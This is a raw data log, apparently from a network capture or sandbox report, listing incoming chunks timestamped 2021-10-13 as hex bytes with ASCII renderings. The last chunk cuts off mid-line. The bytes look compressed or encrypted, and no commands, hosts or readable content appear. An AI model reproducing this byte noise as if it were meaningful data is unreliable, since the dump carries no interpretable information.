2021-10-13 07:59:22 UTC	398	IN	Data Raw: 96 0d de 16 71 16 76 b6 4f ff 79 a5 b2 7e 75 51 67 ee 14 8f 49 a3 eb e3 4f 74 09 52 d9 71 d5 7e c3 ea c4 d6 d4 d2 32 47 bc b3 12 02 58 f2 25 3e 39 16 ed b6 4e 9b 18 44 1a 11 d3 a0 31 ba 5a 63 8c b6 be 20 63 28 ae 53 2f df 06 12 d2 33 73 87 29 1c 1c 5f 36 d1 25 64 af 37 19 9f ad 16 29 74 61 44 25 98 3e 8e 91 66 af ef 5c 27 f2 c0 27 3f 16 94 99 ac bf 5e 9b 1c 56 c1 37 69 8c bb 69 ff ab 44 ce 7e 4d 7f fc 02 8b 62 65 bc 1a 6d 79 b7 99 91 30 36 bf e0 5a cb 09 e2 74 2b 5e 79 e5 e1 0b f1 df 78 b2 d1 9a 15 b2 ca 62 e5 b4 55 83 7b 9d e7 4b e4 f8 64 86 23 a2 65 e2 cf 00 d8 9a 7e 8e f3 51 0e c5 ce 5d 50 99 99 d2 af 34 a7 d3 20 06 ae 2e a7 5a d8 14 8c 62 df 64 b4 f0 83 65 8c 30 9b 79 84 5e ef b8 f1 5f 2a 59 ca 08 9c c7 99 24 7e d8 90 8c 07 27 29 c7 39 e9 48 da bf ee Data Ascii: qvOy~uQgIOtRq~2GX%>9ND1Zc c(S/3s)_6%d7)taD%>f\''?^V7iiD~Mbemy06Zt+^yxbU{Kd#e~Q]P4 .Zbde0y^_*Y$~')9H
2021-10-13 07:59:22 UTC	406	IN	Data Raw: 61 8a aa ed 85 5b 17 78 b7 cc 21 ad 70 ea 7d 53 43 b7 cb 1f 6c a5 8e 71 fc f1 61 0e f7 e2 c8 77 9a 4e 0a c9 c2 ab 33 77 73 c0 83 30 3f 81 54 a1 2a 89 e6 7d 40 c2 a4 32 ef 9c 45 93 c3 70 a7 09 27 ea 37 82 30 b1 bc f9 5a 01 9e 20 03 bc 1f b2 bd 38 cd 60 ba dc 8c 79 35 41 84 56 a4 31 0d dc 69 3e 98 13 13 ad 8a c2 c3 70 90 b0 1d 6b 20 20 51 1b 99 66 06 a6 86 78 e4 89 d2 d9 a6 c4 13 70 bc 8e e5 ea 65 c6 27 05 ef b6 7b b5 27 a2 5f ab e4 35 c5 ca 04 c2 af 56 f3 3c 21 62 5d a3 0f ad a4 c6 42 a9 58 42 6e 05 db d2 c9 02 a2 6a 98 ef 00 5f 7a 38 21 67 b7 50 82 48 31 0c 18 d6 9c d2 db 07 32 3e 6c 5d b4 f8 c4 43 9d db 00 b8 30 ec 23 e3 81 89 22 90 2a 24 36 1d 6c 3c 23 51 af eb d5 0a e5 01 2b 5e b9 30 38 89 42 a4 67 c2 61 d5 a2 46 2f 39 f0 15 be 94 da 4d cd 07 5c ec 3d Data Ascii: a[x!p}SClqawN3ws0?T}@2Ep'70Z 8`y5AV1i>pk Qfxpe'{'_5V<!b]BXBnj_z8!gPH12>l]C0#"$6l<#Q+^08BgaF/9M\=
2021-10-13 07:59:22 UTC	414	IN	Data Raw: 87 ff 65 b7 49 2c 3a 03 d7 05 e1 d4 14 10 78 c2 b7 49 bd 97 5f aa 46 e7 2d e4 a5 62 c8 c0 02 18 28 01 8d 7d a5 a8 66 da 65 e0 a4 4f ba ea a3 c3 82 39 73 8b be a3 9d 9c 7f c6 89 83 6f 6b 75 b7 63 de 2e 12 22 37 6a 57 cb 12 87 24 6e 00 29 e9 2f 31 32 68 26 8d 78 14 af b2 b8 34 f5 74 ca 92 c8 07 ca 51 c2 3f e5 f7 6a aa 3d 77 4d a3 7b 13 6d 00 c3 e9 38 15 29 b1 b3 b1 e9 ab 00 6e fd 18 28 a9 b7 a7 64 af 3b 8e 08 8a 0a a2 3b 48 d6 9a 32 f6 5c e2 00 17 78 04 8a 5e 71 b4 3c 4f 24 72 3e e8 67 b0 81 fb 40 09 9a 21 eb 4f ba 42 c2 22 3b 43 24 7d c6 a9 e3 72 e1 68 ad 44 32 0d 34 cb 45 5d 22 d3 a8 e0 2b 7d 11 8a 36 f7 a6 17 f9 60 20 1e b7 45 66 69 15 bb 58 6f 3c b6 a7 05 ee 15 22 87 b7 6a 9e 19 e6 46 f4 b4 8f 22 4b 79 d8 d3 fc ae 66 2b 7c b2 4d 53 6f 9d 2a cb 30 74 5e Data Ascii: eI,:xI_F-b(}feO9sokuc."7jW$n)/12h&x4tQ?j=wM{m8)n(d;;H2\x^q<O$r>g@!OB";C$}rhD24E]"+}6` EfiXo<"jF"Kyf+\|MSo*0t^
2021-10-13 07:59:22 UTC	422	IN	Data Raw: 63 c3 8c 9a e4 f7 69 bd 81 03 03 19 2d c7 91 37 2c 0a 10 97 88 00 9f 3b 56 84 e0 45 b4 06 94 e3 b8 24 d0 66 60 de b9 a5 6a 26 9c db 83 69 28 6f 24 94 ef 84 6e 21 0f 94 11 b3 62 cd de 6b 09 fe 82 07 7a aa ff 1c f0 15 a0 f8 20 7c 28 e0 1e 7f 09 7c 49 0d 02 23 da 66 ea ae 2a 5a d0 6d 9d 85 bc 9c 52 0b 93 0a 26 06 14 94 03 62 75 e5 a7 82 44 d8 41 ae a7 09 50 33 63 9a 62 ff 9d 2a a9 0a da 0f 10 83 56 45 d4 43 fd 92 10 30 8a 2b 7b 54 50 9e 5a fc f9 40 a1 25 79 6e 4b c9 31 9b 15 ca 02 92 76 4d 7a d3 87 a1 22 b0 e0 70 d6 76 65 16 af 3f a0 cb fe 74 87 e3 3f 61 2c c5 8f 43 12 7a 05 a6 79 ab 68 09 4d 73 27 81 69 7f dc 37 cf 76 de f3 33 de 36 31 5b 63 49 0e 1f 7f dd 9f 68 07 76 86 76 b6 f3 cc de c8 a0 47 28 14 3b 03 ce f3 50 a0 90 ab 3b 9e 2b 07 03 57 79 e8 a5 81 9b Data Ascii: ci-7,;VE$f`j&i(o$n!bkz \|(\|I#fZmR&buDAP3cbVEC0+{TPZ@%ynK1vMz"pve?t?a,CzyhMs'i7v361[cIhvvG(;P;+Wy
2021-10-13 07:59:22 UTC	430	IN	Data Raw: 3b 7d a9 2c 4b d2 bc db 37 a9 39 75 0b b8 26 6e 6c 0e 16 91 da be 41 b5 cd 6e 26 db 57 d0 24 75 42 05 1c b6 f6 16 d2 43 9d 1b 39 45 2d 32 8a e5 20 26 45 6e 3c aa 6d 32 08 5a 8b 40 f9 f2 d6 0f 3c 74 07 a5 c5 29 19 99 52 5c f6 7d ff 2d 2c 93 3b 24 6c ea c8 ea d8 ac 3c 7f 1a ad 37 b9 02 1a ff 39 11 dd 32 cf 24 13 5d 67 ca b1 b2 b4 a4 37 98 80 c9 81 ed 39 5d a2 a3 f6 02 45 90 fe 06 04 cd 8c 3c ad b5 08 d6 07 4b fd 2e cc 2b 40 a8 d1 f2 51 2e cb 1d 0a 5f 3c c0 ea 4a 12 bc 24 c0 a9 e6 49 da 64 c9 4a 7d 82 49 2d 45 14 b2 07 b3 c6 29 65 42 31 4f 44 69 1b 00 9e ec 6f 94 01 9b 9c 24 0f 11 e4 a1 39 41 52 b4 57 75 2a bf df 53 b2 a2 26 20 3c cb 76 8c 55 04 1e d6 65 04 cf 13 4c 65 3c bf 78 4b 06 39 c2 b2 c9 6f 28 8c b7 77 7e 98 1c a3 0b 40 5d 9d 97 09 51 56 81 8c 26 c0 Data Ascii: ;},K79u&nlAn&W$uBC9E-2 &En<m2Z@<t)R\}-,;$l<792$]g79]E<K.+@Q._<J$IdJ}I-E)eB1ODio$9ARWu*S& <vUeLe<xK9o(w~@]QV&
2021-10-13 07:59:22 UTC	438	IN	Data Raw: 0f 69 91 96 39 30 56 aa 39 d4 5a b8 07 06 87 f6 41 b8 9d b6 7c 1a 29 bb 1e a5 9f 74 cf 6f 70 66 d2 c6 b1 f3 cf 3c 56 31 dd df 58 b1 6e 24 ed 41 9f 2c 79 94 07 12 24 dc a8 23 45 96 e3 93 c2 46 32 10 79 84 d3 04 1c bb 92 76 b6 65 d5 90 37 01 29 aa 71 eb 44 40 25 e4 ea 24 39 5d 8d dc 37 b7 86 3e 25 83 ab 06 28 b5 0a c7 fe ea cb 8a d0 b2 7b 9a 98 49 31 b0 2c 0e d4 f2 84 05 d2 52 24 02 89 80 0c 6c 02 fe c9 2c 21 c9 5e 43 c4 9e 19 90 a2 07 a0 35 43 72 2e 9a 49 14 d9 e7 d7 db 56 1f 56 88 46 95 15 2a 8f e4 24 5e 81 b4 97 1c b7 d7 55 e0 1c 1c b8 31 71 bb a5 c0 f3 ba 8a 9a fe 71 62 52 58 97 33 e7 39 be 91 3b f6 a7 97 8d 07 00 f1 29 6d c0 ee e3 7d 40 f3 bb 6c 95 2e 77 f0 33 bd 41 0d fb 04 c0 30 5e 59 2c 39 93 06 0d 09 77 ea 1e 31 3b 17 7a 80 3a 30 97 5a 6b db 4f 59 Data Ascii: i90V9ZA\|)topf<V1Xn$A,y$#EF2yve7)qD@%$9]7>%({I1,R$l,!^C5Cr.IVVF*$^U1qqbRX39;)m}@l.w3A0^Y,9w1;z:0ZkOY
2021-10-13 07:59:22 UTC	445	IN	Data Raw: a8 c6 e3 e1 4b 11 8a fb 06 03 d1 56 72 08 8c 94 6e c0 91 1a a5 69 76 7a ed ff d5 5f dd a4 df 75 20 54 84 dc 28 3d 34 e7 b6 30 a3 6c f6 9d 17 09 7a 6e 07 7b 13 5a 2e 1d de 05 11 38 88 bf 62 74 09 18 d1 1f 40 30 9e d7 3f 52 77 fb 3b 6c 40 36 cc 4e 0a 0c d8 9c 01 2c bc bb de 8a 95 39 90 be f4 12 22 8b 18 10 ef 12 7e 85 af a3 f6 d9 8e ff af 66 5f 8b 39 21 a9 50 4d 8d e9 a5 2f b0 21 98 c2 92 e2 4c cc 27 94 bd 4b 29 17 59 c0 50 79 f8 c8 dd 78 24 10 6d 1c 30 25 ff 2e 01 14 9b 95 3f 09 33 c6 ed 04 d4 36 2b aa 13 97 5a 8b 4e 91 1a a8 41 51 20 38 c2 11 37 1a 3a 6a 98 20 02 35 18 93 28 69 18 97 da 41 36 59 93 55 d1 ac df 59 4e 71 54 d3 3b 4b 54 a9 12 9e 3c 4f bc 8e 91 6f 01 ac 49 41 52 93 16 8f d0 b4 9c e6 47 11 39 cc e2 c8 b8 46 80 5d 25 4a 38 d6 23 1c 29 b0 ed 2d Data Ascii: KVrnivz_u T(=40lzn{Z.8bt@0?Rw;l@6N,9"~f_9!PM/!L'K)YPyx$m0%.?36+ZNAQ 87:j 5(iA6YUYNqT;KT<OoIARG9F]%J8#)-
2021-10-13 07:59:22 UTC	453	IN	Data Raw: 23 9c 1e d0 2c c3 49 60 b0 8d 2e 8c a0 90 68 d3 b9 93 b4 53 97 45 58 f7 69 a7 d5 28 ed 1f 4a 5f 20 04 07 d8 a9 29 51 d6 74 5b f0 a5 a6 cb 24 d2 e9 22 ae bc 1d 13 10 c0 89 18 d8 6c 17 a7 ba 5c 34 3a 80 b8 8d b0 b8 bb c8 41 67 66 80 7a b6 69 99 4c b2 26 a7 59 4f ef 6e 8a c5 21 d2 32 f0 40 66 89 11 f0 a8 6b d2 8c 2a 79 1e 64 70 1e be df fe 28 4c 11 7d 48 df 13 c8 76 67 9b 89 43 19 c3 29 94 4a 9d b6 2a ca fb f3 34 2d 85 b0 13 84 db b1 13 83 2f c7 1a e9 be f2 f1 f3 70 36 f6 b8 40 4b 24 e6 9f 54 39 a0 86 13 17 f8 8f b3 77 c7 02 6b 03 2c a5 8c d0 d5 6f 59 52 41 bd 59 49 4e 57 a5 08 a9 8a 87 09 58 26 2e dc d1 82 1e 9b 7a c2 2a 9c 27 be 0e e2 15 e6 71 72 c9 c5 74 4b b8 01 33 fa 13 61 9a ce 30 93 c5 c1 bb d4 be 99 25 be 15 76 f1 17 c1 3a ef 18 9c 42 32 c8 d7 00 dc Data Ascii: #,I`.hSEXi(J_ )Qt[$"l\4:AgfziL&YOn!2@fkydp(L}HvgC)J4-/p6@K$T9wk,oYRAYINWX&.z*'qrtK3a0%v:B2
2021-10-13 07:59:22 UTC	461	IN	Data Raw: 85 dc 25 bc f2 b5 b9 4d ea a7 28 f8 95 38 90 95 de e2 3d 33 1e a5 2e 16 e2 e1 6a a2 ee da 86 07 20 09 a9 31 7a cc c6 bd ef 4a 39 1b c9 70 9f f3 5d b4 9b c4 39 0a 80 03 d8 58 16 b9 d9 82 8d a2 7d 31 6c 60 73 36 18 b5 47 0b 9a 05 81 74 97 ff ba 48 e0 b5 2d 97 b3 3e 3b 38 16 b9 c6 51 3a 4e 9b 97 dd a1 2d 09 1a 34 64 c2 78 72 db 6b 31 9a 3d 1d 27 6b e9 b3 15 bd 5c 10 a3 26 1a d7 f2 4e 0b de 98 f9 81 1a 06 f2 c5 78 32 ac d6 81 83 b5 47 f6 04 c0 33 c6 e4 03 e6 e8 21 c4 84 c0 26 e9 4e 2c 01 9d ca dd 23 b0 0f 1d ba bf 9f 16 29 bf 7f 79 86 75 8d a7 f6 17 84 70 52 be 58 b6 6c 83 35 1e b3 0f 68 c3 a9 2a 44 5d 92 a7 30 8b 8a dd eb 05 41 c0 2f ac 30 46 6b ca 9a 6e 89 c4 9f 45 67 23 b6 3a 39 0b 74 1a e1 9b 41 ab 25 52 78 36 fb 39 c6 74 04 60 75 fc 2b 31 6c 0c 84 ea 11 Data Ascii: %M(8=3.j 1zJ9p]9X}1l`s6GtH->;8Q:N-4dxrk1='k\&Nx2G3!&N,#)yupRXl5h*D]0A/0FknEg#:9tA%Rx69t`u+1l
2021-10-13 07:59:22 UTC	469	IN	Data Raw: 08 c7 b8 78 be d4 a7 49 70 59 c6 3f fa 85 e7 eb a1 5e 7c f1 cb 69 6d 35 3a 7b 72 ce 84 c4 77 9a c9 39 d0 4f 09 74 d5 d1 6a 46 91 2a ea ab be 52 24 81 f4 f8 f5 f2 29 8f 58 4e 44 68 46 7b 5c 52 a0 08 58 a8 a8 13 05 7b ef 8d 90 f1 2e d5 67 f0 cf 90 b4 14 95 86 ab f3 c3 13 87 58 27 58 b1 03 b5 77 cd f4 24 99 1c 12 bd de c7 43 d6 bf 04 8f ca af 37 06 4d 7b fe a5 e9 5c 34 21 bd 47 b8 3a 9c b8 65 ac 4a 90 36 61 f5 8a d2 41 b0 16 9d 58 4c c8 1a 01 26 43 54 14 4f cf 70 14 68 39 61 2d fd 0e c6 ce 7b 53 9b cd aa 55 ad 30 94 d4 42 ac aa 9c 11 b3 ce 04 82 38 7f 28 26 36 24 ac 7d a0 2f ab 54 de d6 e8 af dd a0 20 e7 4c 88 e5 da 0d 11 8a 20 0f 8e 42 b4 50 fb 04 20 10 ab 50 b9 d1 b1 24 a9 5e 93 5a b3 69 16 e6 45 bb b6 89 51 3a 39 be 6a 07 f0 4c 9b de 81 b3 e3 19 9c 72 31 Data Ascii: xIpY?^\|im5:{rw9OtjF*R$)XNDhF{\RX{.gX'Xw$C7M{\4!G:eJ6aAXL&CTOph9a-{SU0B8(&6$}/T L BP P$^ZiEQ:9jLr1
2021-10-13 07:59:22 UTC	477	IN	Data Raw: d0 16 87 78 64 2d c0 a6 a0 d4 c3 7e a1 70 d4 a7 27 22 a1 07 09 6b d6 06 6c 86 99 68 e6 83 b9 84 23 74 a4 dd 13 6e bb 23 49 ae e4 60 c0 1a fd 97 d1 a2 cf 56 79 54 1a 09 78 dc 50 d0 e5 10 4b 50 b6 bb ae ad 11 b3 42 00 21 95 de 02 f1 52 54 81 be fb cd ab 6e 18 ba 51 f3 70 d6 7c 47 e0 82 55 81 41 69 79 78 d0 b9 7d 2f 25 ce 33 42 bd 58 b7 cf 02 c2 72 ad f4 92 c4 37 64 5a 14 29 a0 cc a6 90 60 d1 ce df 3d 5d 6a 96 75 08 62 24 91 be d2 5b f4 e6 e6 a9 2a f7 8d 26 07 53 3b df 10 ce 36 86 19 29 05 e6 6f 23 81 95 7f 8f 8d a2 1f be 61 a7 a8 af d5 be 3e d7 38 b0 92 3b 81 2b 1c 3c d6 f6 0f ba fb 24 0f 77 e3 12 7a e2 dd ad 9d 4a dc 0c 21 7d 18 b1 89 42 2b 18 5e 0f ea e0 be 1c 38 b0 46 99 79 7d c9 67 da 08 5f cd 5a a1 96 40 97 a0 5c 18 85 66 64 0f a4 06 ce 6c 61 8c a8 26 Data Ascii: xd-~p'"klh#tn#I`VyTxPKPB!RTnQp\|GUAiyx}/%3BXr7dZ)`=]jub$[*&S;6)o#a>8;+<$wzJ!}B+^8Fy}g_Z@\fdla&
2021-10-13 07:59:22 UTC	484	IN	Data Raw: e0 fe de 54 4c eb 6d e3 36 27 7b 9a 59 e7 39 71 73 6f 76 ad 43 4a b2 02 eb 80 e5 d0 3b 6e 93 08 7c 68 19 14 2a 85 d4 62 0e a3 a7 a9 71 b7 92 27 6e 7b 70 ce a7 84 fc 9f 26 69 e4 57 9b 92 2d bf 30 b0 15 cc 6e f7 4e bb 00 0a 1d 01 76 95 7c 01 8e 36 5d 25 98 59 2b 4f 27 88 50 50 12 05 62 7b e1 85 b0 47 bf 33 8e 4c 95 4f 4f 48 fa 14 18 b3 f2 35 84 35 2d 23 fe 25 c1 ff 3c 2a 08 99 f0 3d be 14 da 58 8a 3c a1 16 c7 24 fc ef 04 48 17 3f 1d b9 7c 38 13 6d 99 17 11 88 f9 61 1d 20 eb 60 08 a6 7b 96 b2 50 ca 5d 06 18 30 1b bc 50 fc a3 61 ab 49 ba 50 5a 3f 2c cd 25 a0 ce 4d 92 6c ab 05 02 72 15 d9 15 88 77 7c 87 fd 7b 4e 7a c6 32 a0 b0 3f 36 61 08 8d 07 f5 9b c2 8c 00 47 56 38 ad 6d cc 51 df c7 df 39 65 0a 4c 0a 0b 45 1e 0e 92 b2 4d bf 67 31 e0 91 96 c5 2a e9 34 0d 91 Data Ascii: TLm6'{Y9qsovCJ;n\|hbq'n{p&iW-0nNv\|6]%Y+O'PPb{G3LOOH55-#%<=X<$H?\|8ma `{P]0PaIPZ?,%Mlrw\|{Nz2?6aGV8mQ9eLEMg1*4
2021-10-13 07:59:22 UTC	492	IN	Data Raw: 19 b2 4a 5e ee 22 b9 32 ef cf bc 67 27 8c 9e 64 1b ec 8c 47 f2 c0 58 84 d1 c6 0a f6 72 78 b2 24 c6 ae 83 2d 66 a4 3a 56 57 86 7f 70 42 5b 78 44 6d a2 85 49 73 83 6e a2 bf 60 46 1c 3d fa a2 f0 fa 41 d7 b7 5a 95 f4 90 69 53 47 64 f5 17 b5 a9 96 e1 ef 4f 2e 50 c6 3e 75 4d 5c 12 80 3b 2a 83 96 c4 d1 b8 71 85 a6 2c 83 a0 b9 3b 71 34 7c d0 6c 98 d0 62 78 09 4c 2e 15 a3 ee f4 95 9b c4 f7 0a 1f 15 25 ad 46 42 86 ac 71 70 87 87 09 bb 7c 24 42 ce c0 36 2c 19 fd 3b 3e 15 c3 09 23 3f 1d a7 bd 9c 6e 0e 4d 19 c5 86 88 2e b8 a6 0b 65 25 bc 84 e0 37 e2 df e6 fb 5d 61 62 57 92 73 ae d1 eb f6 9f 01 ed 68 4a c6 d5 8e 72 ef 69 13 7a 06 61 32 b7 07 19 ce 14 3c 5e 4f b6 4f 6f 90 85 34 d7 16 1f a5 15 40 dc f9 4a 95 88 5b b6 0b 15 00 82 c1 40 28 05 52 62 81 54 40 3a 5c d3 d1 3f Data Ascii: J^"2g'dGXrx$-f:VWpB[xDmIsn`F=AZiSGdO.P>uM\;*q,;q4\|lbxL.%FBqp\|$B6,;>#?nM.e%7]abWshJriza2<^OOo4@J[@(RbT@:\?
2021-10-13 07:59:22 UTC	500	IN	Data Raw: c4 b7 1b 2b 7a 62 c2 af 5a 03 f1 6c 3b 3b 7c 90 54 cc 47 1a d6 b1 f5 1d 7a 50 46 78 4b 44 9d 4b 12 5c f7 64 3e 5c 00 f0 a3 a9 c4 66 8e 85 3d 49 e6 9c ce ad 7a 41 fa 92 7d e8 e2 df 5d b0 be e7 f6 0b 98 08 03 c0 f2 0d f3 17 80 91 0b af a6 79 f8 43 7a a4 45 6e 80 63 93 8e 1b cf 61 74 44 79 b3 fd 05 af cb d7 aa ff a5 5a 50 d7 a3 b4 a9 95 49 ef 93 b3 04 7a 71 29 17 97 59 a0 e2 cf dd 34 26 98 17 bd 6d dc 72 ca 46 19 d0 32 f6 1d 7c eb 90 4c 98 f8 e0 7e 5e 2f 9d 8d 20 a8 e5 eb a4 a0 a5 7e 54 5f 97 d4 b6 42 84 4a 8d 57 44 45 5e 09 b9 42 1b 59 30 26 ec a9 2b 38 d3 3e b3 a4 61 ab e2 94 37 a2 ac a2 f7 8d 2d 05 78 8c 84 e1 6b 27 43 1d e7 22 ab af 2e 3c 06 f2 37 eb 2d 65 ed 01 79 f2 9b c2 ac 36 03 6f af d4 6d c3 a7 04 61 7f a2 69 ab 66 fe 24 e4 8e ab cb c0 f9 21 63 65 Data Ascii: +zbZl;;\|TGzPFxKDK\d>\f=IzA}]yCzEncatDyZPIzq)Y4&mrF2\|L~^/ ~T_BJWDE^BY0&+8>a7-xk'C".<7-ey6omaif$!ce
2021-10-13 07:59:22 UTC	508	IN	Data Raw: ef d6 23 92 92 2c 62 e0 9a ce 1c 6e ac 50 0b 9a 0b a3 a3 98 d6 df e0 85 4e 37 6d 62 e5 f1 1a 3d a8 97 c2 8c 99 1d 6b ac 3d 49 d0 12 c3 ed 65 bf d9 b8 c4 dd 55 1f 85 56 43 03 21 9e c4 28 96 33 c8 d2 f9 95 19 38 8f 06 bb 1b cb 8d df 1a 1e ac a6 32 c5 99 db 20 5a 49 37 1c dd 50 f6 2b ee 8c 4e f8 a0 2c d1 ab 26 bd 80 b2 83 a3 9e 5e 0d 4b 86 cc 69 92 b4 ba de 29 21 fb e2 aa b4 7a b5 a7 a8 c7 cd c4 88 28 0a 5c 2e 50 ca 65 2d da 26 ce 7d 9b b3 7c ea 93 7a e8 78 71 01 0a 1c b6 8a 8e 6e 7f 4a e5 ad 34 7d e3 8f f6 88 ee 5f 87 f0 c1 3a 68 92 e0 9b 4a ff 78 c7 fd 7b dd db a7 ac dd e5 b6 33 d1 bd b0 ad 45 a8 bf f1 98 86 ec 81 ea fe c1 f2 8d 1d 17 36 f2 6f 74 f2 33 83 fe 29 fc a7 0c 59 07 97 e0 cc 10 0e 71 87 ec cd db ae d6 30 01 2b b6 b6 9a 44 95 43 2f db 95 47 f7 79 Data Ascii: #,bnPN7mb=k=IeUVC!(382 ZI7P+N,&^Ki)!z(\.Pe-&}\|zxqnJ4}_:hJx{3E6ot3)Yq0+DC/Gy
2021-10-13 07:59:22 UTC	516	IN	Data Raw: c4 83 0c df 1e f0 67 79 ed f8 89 a1 38 e9 a0 fd de 28 c3 0d 98 26 fb 0f 2f 0e ee be cb 9a af 4e c5 7b 79 7b b7 29 9c bd b6 65 ed 9e bc 7b b7 4a f9 e6 e7 d9 bd 76 eb ac cb d8 81 82 35 3e 81 6e a8 93 ee 28 ee ba 78 71 39 17 4b 0f 44 c0 54 3f d6 11 e3 ea 5d 56 5d 67 de 59 f0 b7 c0 aa ee ea 69 8d eb 19 4e 98 e1 07 95 80 03 6f 79 cb ce c8 36 b1 9e 7f dd 99 0f 34 c9 72 18 ce 7e 70 b8 64 94 52 be 98 52 36 85 bc 70 a1 e2 3e e3 72 94 80 2e 40 50 39 0d 70 0d ca 87 fd 4d 8a a5 3a 99 d6 67 36 a6 22 d6 52 ec 53 95 63 d2 f5 6e 7e b1 bf 6c de af e0 28 b6 62 c1 56 7b 92 82 47 09 92 1f d0 b0 5a 36 bb 1a 2f bd cb 5e 06 c3 5f e1 9f ed 53 8a a4 97 87 09 79 ee 7c 04 83 70 ca 40 ce f5 4f 1f 35 e7 6e 09 b5 b4 28 f8 1c 0c 2a 0a 0e 83 67 c5 0f 7c df 51 d3 5c ce 9c 6b 49 8c de af Data Ascii: gy8(&/N{y{)e{Jv5>n(xq9KDT?]V]gYiNoy64r~pdRR6p>r.@P9pM:g6"RScn~l(bV{GZ6/^_Sy\|p@O5n(*g\|Q\kI
2021-10-13 07:59:22 UTC	523	IN	Data Raw: 4b 64 03 08 13 2d d1 3c 63 b7 a1 d0 0c 3f a2 27 90 11 8b 4a b6 3c 1e c6 39 83 67 33 67 60 8b 2b 27 07 59 dd 96 f6 49 f6 88 49 87 6b 23 af 5d d6 b4 86 24 cd 92 82 24 3c 78 ca 0d d9 17 16 f7 16 51 18 be c1 45 49 76 c9 19 19 a2 2b e7 c4 1d cd 52 25 fd 9e 44 ea 85 5f ae 67 2f a7 b8 63 0b 72 49 5f 87 92 1d 15 3e 36 08 f3 b9 ea bd d9 39 12 45 04 0d f7 96 c7 17 d0 ee 8a bc 2e 97 a0 16 65 aa 3c fb d3 1b 6b f8 b0 20 f9 5a cc 1f 4a 86 64 d6 29 47 a7 90 31 c7 96 99 da ce 66 6e 48 78 2b 84 3b 48 1f d9 72 09 72 b9 d0 77 b6 18 78 ff c1 7d 04 5a 6b a3 9b 18 7a 8c 18 10 71 7d fc 59 fb db 00 5f 62 f4 14 2d 52 d6 2e 06 c3 12 34 d8 88 ea c8 34 d9 2a d6 c8 05 5f d6 5d ed d7 61 79 51 86 d9 21 6b ef f2 cd b7 f2 48 8f fa c3 f8 7f ce b1 6e e0 27 f7 23 9b c1 74 b3 0e cc 16 8d 45 Data Ascii: Kd-<c?'J<9g3g`+'YIIk#]$$<xQEIv+R%D_g/crI_>69E.e<k ZJd)G1fnHx+;Hrrwx}Zkzq}Y_b-R.44*_]ayQ!kHn'#tE
2021-10-13 07:59:22 UTC	531	IN	Data Raw: 45 91 cb 5a 5f 4e de ff f5 5e 51 26 66 ee 72 fc e4 ef 1b 38 ba 4e 94 c9 78 36 d5 aa e8 f5 cf 53 30 4e e5 83 5d a7 6d 3c d8 28 3a bb 42 9d 64 bb 47 31 5e 85 e2 a3 90 1a 96 3f c1 79 6b 99 4d e6 be b1 37 cb fb ec 9e 35 26 0e 02 f9 d0 80 97 58 a6 ef c5 6b 52 48 6a 75 c3 fa 83 33 ce 45 35 45 8a 95 3f ca 1f bf 37 6f 14 cb b8 d4 96 65 63 85 d5 61 56 f3 19 80 d2 4f 0b bd c0 74 70 19 29 4b 88 bf 8c dd 4d bd 37 96 f1 0f ed f0 dc 69 79 4d 9f 46 69 dc dd 73 53 ea 9c 75 91 b8 c9 33 04 50 fb f1 3b 93 6e 0e f4 4e 73 25 4b 6a a7 74 a4 5a bf 1d 69 e0 61 77 61 99 a5 ab dd 5d 57 e2 bd 67 c1 ca e9 5b 32 58 e5 af 67 0f 7e 67 fa 55 31 fe 25 ee 74 40 03 11 e9 58 12 ab b7 47 d8 8f 34 3c e2 05 52 3f 1c f4 05 88 3f 9b a5 71 7e 71 d2 ab 5b 8d c6 6b 2d 54 e9 1c 89 4a ae cf 14 a4 8d Data Ascii: EZ_N^Q&fr8Nx6S0N]m<(:BdG1^?ykM75&XkRHju3E5E?7oecaVOtp)KM7iyMFisSu3P;nNs%KjtZiawa]Wg[2Xg~gU1%t@XG4<R??q~q[k-TJ
2021-10-13 07:59:22 UTC	539	IN	Data Raw: dd 2b bd c6 be 1d 9c 03 2f f4 ca a2 c4 24 40 10 49 78 e0 cf 87 72 96 96 fa 7c 66 5b 1e bc 18 c2 64 02 40 6c 3b 98 5c 09 80 60 35 d0 e9 00 72 22 a1 50 d3 49 f2 21 bb 0a 51 85 de 7c 73 21 4e f0 ac cf 4e 7c 97 13 5a a2 76 df 3d 36 75 bc fa 39 f6 5f b5 4e 54 84 ed 93 b1 03 1c ba 5a f0 8f 15 7e 45 4b 57 b2 15 bf 66 d7 e8 f4 13 bb 71 88 2f 9c 4e 77 20 fe 20 ec 66 4c c1 2b b1 ab 62 5e ab 72 49 b5 b0 95 ed cd f2 61 8f 58 7d 00 cc 66 3b ce f2 2d bf 88 0f 2e 94 03 17 3e fb da 9e 47 35 d4 98 25 1b 36 7d ab f8 1c 38 78 7c db 3b d7 2e 8e bb 0a 46 d0 fc 8f 9c 9a 9a bd 19 4c 1a 38 3f de c7 9c ca 81 30 ee 5d 04 b8 82 1c 6d e3 de e3 bf 1e bd eb 18 f5 0e 98 f1 53 08 ac 0c 27 da 00 94 4a 40 33 42 2c 5a 91 6c a8 b5 c3 8f 21 2f de da 39 5b 65 d7 8f 8f 3c 96 16 b1 23 f6 e6 b8 Data Ascii: +/$@Ixr\|f[d@l;\`5r"PI!Q\|s!NN\|Zv=6u9_NTZ~EKWfq/Nw fL+b^rIaX}f;-.>G5%6}8x\|;.FL8?0]mS'J@3B,Zl!/9[e<#
2021-10-13 07:59:22 UTC	547	IN	Data Raw: 04 64 5d fd 90 05 43 03 e0 14 06 10 5d 7d 2b 29 a3 93 dc ec 19 9a 5a a4 54 7d 1c be e2 a5 77 73 d4 c6 3d 7d 88 7b 51 78 d0 aa 73 5f dc 7d 59 9d 19 50 b8 c0 3b db a0 cf ec 27 56 c1 0c 51 71 b9 ea c6 ab af 4c 7d ed a3 a7 c7 fb 2a 9e b9 44 72 54 aa 8e 03 84 8e 23 a4 3a 8d 08 d8 6f 24 e1 1d 8f 6d b3 c3 c3 32 6b 81 43 2b 22 ab 38 d2 33 a8 c8 9c 5a 1c 9a 48 8d 90 82 11 b6 e7 51 4f 81 69 18 9d 23 03 bd 7c 14 50 c0 07 08 06 87 0a 9c 81 2c c4 f8 89 ff c6 13 45 2b ef 31 39 e1 fa fc 4e 3c 7d 5c ed 04 87 e7 c6 67 9c a2 53 2d a5 25 d1 a2 b4 1c 3a 27 0e 3c 4f cf 5f d4 e3 c3 f7 d3 ae bf 31 79 a6 e2 ed f9 5a 4d 93 75 a6 b6 26 95 48 a6 34 ab fe ad fc 0e b0 19 68 45 13 fd a9 de ee 25 7e 94 0a bf 42 99 fe 1b 67 a6 d5 e6 67 3a 40 1a 3b 65 90 98 8d 4a 9c 4b 7a 2e de 